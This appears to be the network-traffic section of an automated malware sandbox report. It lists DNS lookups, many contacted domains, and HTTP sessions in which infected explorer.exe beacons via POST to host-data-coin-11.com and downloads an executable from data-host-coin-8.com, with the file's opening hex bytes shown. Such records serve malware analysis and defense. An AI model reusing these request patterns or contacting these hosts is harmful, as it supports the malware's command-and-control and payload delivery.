                                                                                                                                  Jan 11, 2022 23:38:57.512974024 CET8.8.8.8192.168.2.50x9eceNo error (0)goo.su104.21.38.221A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:57.991851091 CET8.8.8.8192.168.2.50x4fc0No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:58.223829031 CET8.8.8.8192.168.2.50x6a10No error (0)goo.su172.67.139.105A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:58.223829031 CET8.8.8.8192.168.2.50x6a10No error (0)goo.su104.21.38.221A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:58.688361883 CET8.8.8.8192.168.2.50x6709No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:58.901601076 CET8.8.8.8192.168.2.50x6583No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:59.110826969 CET8.8.8.8192.168.2.50x5f57No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:59.336113930 CET8.8.8.8192.168.2.50xa4f9No error (0)softwaresworld.net94.102.49.170A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:03.277842999 CET8.8.8.8192.168.2.50x39e1No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:03.613953114 CET8.8.8.8192.168.2.50xcae9No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:03.847063065 CET8.8.8.8192.168.2.50x8ea3No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:04.065174103 CET8.8.8.8192.168.2.50xc094No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:04.286421061 CET8.8.8.8192.168.2.50xc787No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:04.520158052 CET8.8.8.8192.168.2.50xc457No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:06.277893066 CET8.8.8.8192.168.2.50x1395No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:06.508352995 CET8.8.8.8192.168.2.50x29d3No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:06.772353888 CET8.8.8.8192.168.2.50xacf4No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:07.680752039 CET8.8.8.8192.168.2.50xfdcaNo error (0)noc.social149.28.78.238A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:09.064064026 CET8.8.8.8192.168.2.50xcac3No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:09.294975996 CET8.8.8.8192.168.2.50xb0feNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:09.547288895 CET8.8.8.8192.168.2.50x495cNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:13.106859922 CET8.8.8.8192.168.2.50x58e3No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:13.340722084 CET8.8.8.8192.168.2.50x704cNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:13.577246904 CET8.8.8.8192.168.2.50x9ef8No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:13.783409119 CET8.8.8.8192.168.2.50xf586No error (0)sehfdkfjvgn.xyz37.140.192.50A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:16.007565975 CET8.8.8.8192.168.2.50x14e0No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:16.239685059 CET8.8.8.8192.168.2.50xabc0No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:16.470243931 CET8.8.8.8192.168.2.50x8856No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:17.308588982 CET8.8.8.8192.168.2.50xfed8No error (0)noc.social149.28.78.238A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:27.225406885 CET8.8.8.8192.168.2.50x865eNo error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:27.225406885 CET8.8.8.8192.168.2.50x865eNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:27.225406885 CET8.8.8.8192.168.2.50x865eNo error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:27.225406885 CET8.8.8.8192.168.2.50x865eNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:27.225406885 CET8.8.8.8192.168.2.50x865eNo error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:27.225406885 CET8.8.8.8192.168.2.50x865eNo error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:35.920794010 CET8.8.8.8192.168.2.50xdc1aNo error (0)patmushta.info8.209.79.15A (IP address)IN (0x0001)

                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                  • 185.233.81.115
                                                                                                                                  • cdn.discordapp.com
                                                                                                                                  • goo.su
                                                                                                                                  • transfer.sh
                                                                                                                                  • softwaresworld.net
                                                                                                                                  • noc.social
                                                                                                                                  • dgroj.net
                                                                                                                                    • host-data-coin-11.com
                                                                                                                                  • ucnjepelsb.com
                                                                                                                                  • fnufff.org
                                                                                                                                  • edyuxkjhn.net
                                                                                                                                  • hpsqryuep.com
                                                                                                                                  • jdvlj.com
                                                                                                                                  • gylxsot.net
                                                                                                                                  • bfdacebe.org
                                                                                                                                  • data-host-coin-8.com
                                                                                                                                  • ognflovg.com
                                                                                                                                  • vwwgouyyu.net
                                                                                                                                  • ljpmlskjw.com
                                                                                                                                  • hgdqpo.net
                                                                                                                                  • ewfecsg.org
                                                                                                                                  • unicupload.top
                                                                                                                                  • dtnpcii.com
                                                                                                                                  • kbycni.com
                                                                                                                                  • wuweqcxcm.com
                                                                                                                                  • gvaoyk.org
                                                                                                                                  • isitf.com
                                                                                                                                  • iauswed.com
                                                                                                                                  • schieym.net
                                                                                                                                  • hyjcl.net
                                                                                                                                  • 185.7.214.171:8080
                                                                                                                                  • tilkkrykmo.com
                                                                                                                                  • foranher.com
                                                                                                                                  • ojvqrvcy.com
                                                                                                                                  • cbsmoqe.com
                                                                                                                                  • pxquxmnlu.org
                                                                                                                                  • huwmmurp.net
                                                                                                                                  • nrqocneu.com
                                                                                                                                  • svnsu.org
                                                                                                                                  • oqsvas.net
                                                                                                                                  • wxpgf.org
                                                                                                                                  • dlfotbnto.org
                                                                                                                                  • pttknu.com
                                                                                                                                  • jydxuwn.net
                                                                                                                                  • nshrr.net
                                                                                                                                  • pntpge.com
                                                                                                                                  • tjhxrgmht.net
                                                                                                                                  • hsjdosxpvn.org
                                                                                                                                  • hmflv.org
                                                                                                                                  • aacuf.com
                                                                                                                                  • coduhchcur.com
                                                                                                                                  • mtdkhr.com
                                                                                                                                  • pnnppkk.com
                                                                                                                                  • vjmey.org
                                                                                                                                  • nkcbokwpr.net
                                                                                                                                  • qphatsqfxk.com
                                                                                                                                  • psstrgiysi.org
                                                                                                                                  • teodgt.org
                                                                                                                                  • bjmss.net
                                                                                                                                  • ymhmsmhwi.org
                                                                                                                                  • gqyls.org
                                                                                                                                  • 185.163.204.22
                                                                                                                                  • 185.163.204.24
                                                                                                                                  • hrquqg.com
                                                                                                                                  • mqcayqmoy.net
                                                                                                                                  • nfqnt.com
                                                                                                                                  • 78.46.160.87
                                                                                                                                  • ufveq.org
                                                                                                                                  • acqttgcy.org
                                                                                                                                  • whgupdjfc.com
                                                                                                                                  • npfumn.com
                                                                                                                                  • sehfdkfjvgn.xyz
                                                                                                                                  • qtiylkqmm.net
                                                                                                                                  • ylwpvg.com
                                                                                                                                  • hbljr.net

                                                                                                                                  HTTP Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  0192.168.2.549787185.233.81.115443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  1192.168.2.549809162.159.133.233443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  10192.168.2.549906149.28.78.238443
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  11192.168.2.5497655.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:03.399504900 CET1299OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://dgroj.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 156
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:03.517461061 CET1299INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:03 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 18 b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 19{i+,GO0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  12192.168.2.5497665.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:03.945432901 CET1300OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://ucnjepelsb.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 221
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:04.068597078 CET1301INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:04 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  13192.168.2.5497675.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:04.166850090 CET1301OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://fnufff.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 155
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:04.286263943 CET1302INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:04 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  14192.168.2.5497685.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:04.391860962 CET1303OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://edyuxkjhn.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 246
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:04.521224976 CET1304INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:04 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  15192.168.2.5497695.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:04.620791912 CET1305OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://hpsqryuep.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 270
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:04.740032911 CET1306INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:04 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  16192.168.2.5497715.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:05.148039103 CET1311OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://jdvlj.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 242
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:05.256275892 CET1311INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:05 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 2dI:82OI:J_J-WS,/0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  17192.168.2.5497745.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:06.622788906 CET1339OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://gylxsot.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 211
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:06.750139952 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:06 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  18192.168.2.5497755.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:06.888163090 CET1341OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://bfdacebe.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 328
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:07.027370930 CET1342INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:06 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  19192.168.2.5497765.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:07.435899019 CET1342OUTGET /files/9030_1641816409_7037.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: data-host-coin-8.com
                                                                                                                                  Jan 11, 2022 23:38:07.540493011 CET1345INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:07 GMT
                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                  Content-Length: 301056
                                                                                                                                  Connection: close
                                                                                                                                  Last-Modified: Mon, 10 Jan 2022 12:06:49 GMT
                                                                                                                                  ETag: "49800-5d5392be00934"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 